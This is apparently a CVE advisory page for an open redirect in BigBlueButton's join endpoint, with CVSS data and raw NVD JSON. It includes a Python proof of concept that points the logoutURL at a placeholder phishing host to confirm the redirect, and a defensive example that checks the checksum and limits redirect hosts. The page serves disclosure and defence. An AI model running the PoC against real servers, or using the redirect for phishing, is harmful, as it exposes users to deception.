Security Vulnerability Report
CVE-2026-41126 CVSS 4.3 MEDIUM

CVE-2026-41126

Published: 2026-04-22 00:16:28
Last Modified: 2026-04-22 20:26:21

Description

BigBlueButton is an open-source virtual classroom. Versions prior to 3.0.24 have an open redirect through bigbluebutton/api/join via the GET parameter "logoutURL". Version 3.0.24 changes the handling of requests with an incorrect checksum so that the default logoutURL is used. No known workarounds are available.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BigBlueButton < 3.0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-41126 BigBlueButton Open Redirect Vulnerability
# This script demonstrates the open redirect vulnerability via the 'logoutURL' parameter.
import requests


def check_poc(target_domain, meeting_id, password):
    # Target endpoint vulnerable to open redirect
    base_url = f"{target_domain}/bigbluebutton/api/join"
    # Malicious URL to which the victim will be redirected
    evil_site = "http://attacker-controlled.com/phishing"
    # Construct the payload
    params = {
        "meetingID": meeting_id,
        "password": password,
        "fullName": "TestUser",
        "logoutURL": evil_site,
    }
    try:
        # Send the request without following the redirect
        response = requests.get(base_url, params=params, allow_redirects=False)
        # Check for an HTTP redirect status
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get("Location")
            if location and evil_site in location:
                print("[+] Vulnerability Confirmed!")
                print(f"[+] Server redirects to: {location}")
                return True
        print("[-] Vulnerability not detected or invalid parameters.")
        return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False


if __name__ == "__main__":
    # Replace with actual target details
    target = "http://example-bbb-site.com"
    check_poc(target, "test_meeting", "attendee_pw")
```
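The server-side behaviour the advisory describes for 3.0.24, shown as an added example that is not BigBlueButton's own code: a join request whose checksum does not verify falls back to the default logoutURL instead of honouring the caller-supplied one. It assumes the documented BBB API checksum scheme, sha1(callName + queryString + sharedSecret); the default URL, host allow-list and shared secret are constructed values, and the allow-list is a stricter policy than the fix itself.

```python
"""Hardened handling of the join call's logoutURL (added example, not BBB code).

Assumed: the documented BBB API checksum, sha1(callName + queryString + secret).
DEFAULT_LOGOUT_URL and ALLOWED_LOGOUT_HOSTS are constructed values.
"""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlsplit

DEFAULT_LOGOUT_URL = "https://bbb.example.edu/"                # constructed
ALLOWED_LOGOUT_HOSTS = {"bbb.example.edu", "lms.example.edu"}  # constructed


def bbb_checksum(call_name, query, secret):
    """BBB API checksum over the raw query string, minus any checksum= part."""
    unsigned = "&".join(p for p in query.split("&") if not p.startswith("checksum="))
    return hashlib.sha1((call_name + unsigned + secret).encode()).hexdigest()


def sign_query(call_name, query, secret):
    """Append a valid checksum, as a legitimate integrator's front end would."""
    return f"{query}&checksum={bbb_checksum(call_name, query, secret)}"


def checksum_valid(call_name, query, secret):
    """Constant-time comparison of the supplied checksum against the expected one."""
    supplied = dict(parse_qsl(query)).get("checksum", "")
    expected = bbb_checksum(call_name, query, secret)
    return hmac.compare_digest(expected.encode(), supplied.encode())


def resolve_logout_url(query, secret):
    """Pick the URL the user is sent to after leaving the meeting.

    Per the advisory, versions before 3.0.24 could still send the user to the
    caller-supplied logoutURL on a bad checksum; here a bad checksum always
    yields the default.  The host allow-list goes beyond the fix and is this
    example's own addition: even a correctly signed request may only redirect
    to hosts the deployment trusts.
    """
    if not checksum_valid("join", query, secret):
        return DEFAULT_LOGOUT_URL
    requested = dict(parse_qsl(query)).get("logoutURL", "")
    parts = urlsplit(requested)
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_LOGOUT_HOSTS:
        return requested
    return DEFAULT_LOGOUT_URL
```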

References

https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-cvwj-4pcp-f3g8

Weakness: CWE-601
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41126",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-22T00:16:28.327",
    "lastModified": "2026-04-22T20:26:20.563",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "BigBlueButton is an open-source virtual classroom. Versions prior to 3.0.24 have an Open Redirect through bigbluebutton/api/join via get-parameter \"logoutURL.\" Version 3.0.24 has adjusted the handling of requests with incorrect checksum so that the default logoutURL is used. No known workarounds are available."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-601" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-cvwj-4pcp-f3g8",
        "source": "[email protected]"
      }
    ]
  }
}
```